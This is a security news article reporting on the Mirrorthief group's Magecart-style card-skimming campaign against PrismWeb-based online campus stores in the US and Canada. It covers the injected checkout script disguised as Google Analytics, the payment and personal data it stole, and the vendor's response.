Mirrorthief cybercrime group targets online campus stores in the US and Canada with card skimming malware
- The group has impacted 201 online campus stores in the United States and Canada.
- The group is using Trojan.JS.MIRRORTHEIF.AA to steal payment card and personal details of customers.
The Magecart credit card skimming attack has recently been found to be linked with a new cybercrime group called Mirrorthief. The group has impacted 201 online campus stores in the United States and Canada.
What’s the matter?
According to a report from Trend Micro, the Mirrorthief hacking group is using a malicious skimming script - Trojan.JS.MIRRORTHEIF.AA - to steal payment card and personal details of customers. The attack against multiple campus store websites was detected by researchers on April 14, 2019.
The hackers injected the skimming script into the checkout pages of the websites, which consequently sent the stolen information to a remote server.
Which stores are compromised?
After a thorough investigation, the Trend Micro researchers learned that the Mirrorthief group compromised PrismWeb-based e-commerce websites. The PrismWeb, is an e-commerce platform designed for college stores by company PrismRBS, a subsidiary of Nebraska Book Company.
How Mirrorthief performs its skimming activity?
- hxxps://[online store domain]/innerweb/v4.0/include/js/checkout_payment[.]js
- hxxps://[online store domain]/innerweb/v3.1/include/js/checkout_payment[.]js
The injected malicious script is forged as a Google Analytics script.
“The injected script forged the Google Analytics script format, but loaded a different script from the attackers’ server. The loaded script is the main script that steals the payment information. Unlike many web skimmers, which are designed to collect information from many kinds of e-commerce payment pages in general, the skimmer that the Mirrorthief group used was designed specifically for PrismWeb’s payment page,” researchers added.
What information is stolen?
The skimmer collects data only from HTML elements with the specific IDs on PrismWeb’s payment form. The stolen credit information includes card number, expiry date, card type, card verification number, and the cardholder’s name. The skimmer also steals personal information like addresses and phone number for billing.
What action has been taken?
PrismRBS has been informed about the attack. The company has since released an official statement regarding the attack. It reported that the company became aware of unauthorized third-party access on e-commerce websites on April 26, 2019.
Upon learning of the incident, it immediately took actions to halt the attack. It has also initiated an investigation into the matter and notified the law enforcement agencies & payment card companies.